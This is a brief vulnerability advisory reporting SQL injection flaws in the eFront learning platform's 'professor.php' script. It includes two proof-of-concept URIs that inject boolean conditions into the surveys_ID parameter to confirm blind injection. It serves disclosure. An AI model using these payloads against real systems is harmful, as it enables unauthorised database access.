eFront 'professor.php' Script Multiple SQL Injection Vulnerabilities

eFront 'professor.php' Script Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available.

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1--